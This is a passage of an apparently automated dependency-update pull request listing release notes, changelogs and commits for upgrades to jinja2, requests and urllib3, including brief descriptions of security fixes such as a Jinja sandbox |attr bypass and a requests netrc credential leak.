3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.11.3...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.25.1 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 (2024-05-20)\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.0 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.25.1...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `urllib3` from 1.26.4 to 1.26.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/releases\"\u003eurllib3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.26.19\u003c/h2\u003e\n\u003ch2\u003e🚀 urllib3 is fundraising for HTTP/2 support\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://sethmlarson.dev/urllib3-is-fundraising-for-http2-support\"\u003eurllib3 is raising ~$40,000 USD\u003c/a\u003e to release HTTP/2 support and ensure long-term sustainable maintenance of the project after a sharp decline in financial support for 2023. If your company or organization uses Python and would benefit from HTTP/2 support in Requests, pip, cloud SDKs, and thousands of other projects \u003ca href=\"https://opencollective.com/urllib3\"\u003eplease consider contributing financially\u003c/a\u003e to ensure HTTP/2 support is developed sustainably and maintained for the long-haul.\u003c/p\u003e\n\u003cp\u003eThank you for your support.\u003c/p\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded the \u003ccode\u003eProxy-Authorization\u003c/code\u003e header to the list of headers to strip from requests when redirecting to a different host. As before, different headers can be set via \u003ccode\u003eRetry.remove_headers_on_redirect\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 